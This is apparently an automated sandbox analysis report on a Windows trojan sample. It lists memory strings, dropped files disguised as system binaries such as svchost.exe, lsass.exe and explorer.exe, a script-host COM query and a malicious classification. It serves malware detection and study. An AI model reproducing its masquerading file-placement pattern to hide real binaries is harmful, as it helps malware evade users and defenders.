                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    PE file contains section with special chars
                                    Source: explorer.exe.0.drStatic PE information: section name: .'|?
                                    Source: explorer.exe.0.drStatic PE information: section name: .h>&
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00836FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_00836FAA
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exeJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\Globalization\Time Zone\eddb19405b7ce1Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\debug\explorer.exeJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\debug\7a0fd90576e088Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Windows\appcompat\d612fdb7e553d0Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeCode function: 0_2_034416900_2_03441690
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083848E2_2_0083848E
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008440882_2_00844088
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008400B72_2_008400B7
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008340FE2_2_008340FE
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008551C92_2_008551C9
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008471532_2_00847153
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008462CA2_2_008462CA
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008332F72_2_008332F7
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008443BF2_2_008443BF
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083C4262_2_0083C426
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0085D4402_2_0085D440
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083F4612_2_0083F461
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008477EF2_2_008477EF
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0085D8EE2_2_0085D8EE
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083286B2_2_0083286B
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083E9B72_2_0083E9B7
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_008619F42_2_008619F4
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00846CDC2_2_00846CDC
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00843E0B2_2_00843E0B
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00854F9A2_2_00854F9A
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083EFE22_2_0083EFE2
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD348A0D4C10_2_00007FFD348A0D4C
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD348A0E4310_2_00007FFD348A0E43
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348C000021_2_00007FFD348C0000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348B0D4C21_2_00007FFD348B0D4C
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348B0E4321_2_00007FFD348B0E43
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348E100021_2_00007FFD348E1000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348F132521_2_00007FFD348F1325
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348ED5CA21_2_00007FFD348ED5CA
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CA9DE021_2_00007FFD34CA9DE0
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CABB2521_2_00007FFD34CABB25
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 24_2_00007FFD34880D4C24_2_00007FFD34880D4C
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 24_2_00007FFD34880E4324_2_00007FFD34880E43
                                    Source: C:\Recovery\lsass.exeCode function: 26_2_00007FFD348B0D4C26_2_00007FFD348B0D4C
                                    Source: C:\Recovery\lsass.exeCode function: 26_2_00007FFD348B0E4326_2_00007FFD348B0E43
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 27_2_00007FFD348D100027_2_00007FFD348D1000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 27_2_00007FFD348DD5CA27_2_00007FFD348DD5CA
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 27_2_00007FFD348A0D4C27_2_00007FFD348A0D4C
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 27_2_00007FFD348A0E4327_2_00007FFD348A0E43
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 27_2_00007FFD348B000027_2_00007FFD348B0000
                                    Source: C:\Windows\debug\explorer.exeCode function: 28_2_00007FFD34890D4C28_2_00007FFD34890D4C
                                    Source: C:\Windows\debug\explorer.exeCode function: 28_2_00007FFD34890E4328_2_00007FFD34890E43
                                    Source: C:\blockhostnet\msinto.exeCode function: 30_2_00007FFD348C0D4C30_2_00007FFD348C0D4C
                                    Source: C:\blockhostnet\msinto.exeCode function: 30_2_00007FFD348C0E4330_2_00007FFD348C0E43
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 31_2_00007FFD348B000031_2_00007FFD348B0000
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 31_2_00007FFD348D100031_2_00007FFD348D1000
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 31_2_00007FFD348DD5CA31_2_00007FFD348DD5CA
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 31_2_00007FFD348A0D4C31_2_00007FFD348A0D4C
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeCode function: 31_2_00007FFD348A0E4331_2_00007FFD348A0E43
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348B0D4C32_2_00007FFD348B0D4C
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348B0E4332_2_00007FFD348B0E43
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348E100032_2_00007FFD348E1000
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348ED5CA32_2_00007FFD348ED5CA
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C0E0632_2_00007FFD348C0E06
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C12F432_2_00007FFD348C12F4
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C133832_2_00007FFD348C1338
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C000032_2_00007FFD348C0000
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C137C32_2_00007FFD348C137C
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C13C032_2_00007FFD348C13C0
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C14A932_2_00007FFD348C14A9
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C1A7E32_2_00007FFD348C1A7E
                                    Source: C:\Recovery\lsass.exeCode function: 32_2_00007FFD348C13FD32_2_00007FFD348C13FD
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 33_2_00007FFD348A0D4C33_2_00007FFD348A0D4C
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 33_2_00007FFD348A0E4333_2_00007FFD348A0E43
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 33_2_00007FFD348D100033_2_00007FFD348D1000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 33_2_00007FFD348DD5CA33_2_00007FFD348DD5CA
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 33_2_00007FFD348B000033_2_00007FFD348B0000
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348B0D4C34_2_00007FFD348B0D4C
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348B0E4334_2_00007FFD348B0E43
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C0E0634_2_00007FFD348C0E06
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C12F434_2_00007FFD348C12F4
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C133834_2_00007FFD348C1338
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C000034_2_00007FFD348C0000
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C137C34_2_00007FFD348C137C
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C13C034_2_00007FFD348C13C0
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348E100034_2_00007FFD348E1000
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348ED5CA34_2_00007FFD348ED5CA
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C14A934_2_00007FFD348C14A9
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C1A7E34_2_00007FFD348C1A7E
                                    Source: C:\Windows\debug\explorer.exeCode function: 34_2_00007FFD348C13FD34_2_00007FFD348C13FD
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AEdPygqV.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: String function: 0084EC50 appears 56 times
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: String function: 0084F5F0 appears 31 times
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: String function: 0084EB78 appears 39 times
                                    Source: Zn0uX5K1ez.exe, 00000000.00000000.2097208452.00000000012B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepayload.exe4 vs Zn0uX5K1ez.exe
                                    Source: Zn0uX5K1ez.exe, 00000000.00000002.2111357651.00000000018FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Zn0uX5K1ez.exe
                                    Source: Zn0uX5K1ez.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Zn0uX5K1ez.exe
                                    Source: Zn0uX5K1ez.exeBinary or memory string: OriginalFilenamepayload.exe4 vs Zn0uX5K1ez.exe
                                    Source: Zn0uX5K1ez.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: msinto.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: backgroundTaskHost.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@44/294@1/1
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00836C74 GetLastError,FormatMessageW,2_2_00836C74
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,2_2_0084A6C2
                                    Source: C:\blockhostnet\msinto.exeFile created: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exeJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zn0uX5K1ez.exe.logJump to behavior
